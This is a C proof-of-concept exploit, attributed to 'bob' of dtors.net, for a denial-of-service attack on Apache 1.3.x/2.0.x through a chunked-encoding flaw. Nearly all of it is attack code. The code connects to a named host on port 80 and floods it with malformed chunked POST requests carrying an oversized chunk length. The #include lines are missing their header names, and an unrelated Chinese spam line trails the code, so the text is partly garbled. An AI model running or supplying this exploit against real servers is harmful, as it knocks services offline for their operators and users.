/* * Apache remote DoS (1.3.x/2.0.x branches) based on the recent flaw met in chunked encoding. * Please read http://httpd.apache.org/info/security_bulletin_20020620.txt * * * Proof of concept code. For testing purposes only. * * By bob. [www.dtors.net] */ #include #include #include #include #include int main(int argc, char *argv[]) { int sock, i; char chunk[80]; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; fprintf(stdout, "\nApache-Chunk.c By bob. [www.dtors.net]\n"); if(argc<2) { fprintf(stderr, "\nUsage : %s \n\n", argv[0]); exit(1); } fprintf(stdout, "\n---[+] Looking up host : %s.....\n", argv[1]); if ((he=gethostbyname(argv[1])) == NULL) { fprintf(stderr, "---[-] Hostname lookup failed!\n\n"); exit(1); } sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); fprintf(stdout, "---[+] Connecting... \n"); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { fprintf(stderr, "---[-] Connection Timed Out!\n"); exit(1); } else { sleep(5); fprintf(stdout, "---[+] Sending... \n"); sprintf(chunk, "POST /xxx.htm HTTP/1.1\nHost: %s\nTransfer-Encoding: chunked\n\n90000000\t\t", argv[1]); for(i = 0 ; i < 50 ; i = i + 1) { write(sock, chunk, 80); write(sock, "\n\n", 2); i = i + 1; } fprintf(stdout, "---[+] Sent! \n\n"); close(sock); } }

亚洲欧美在线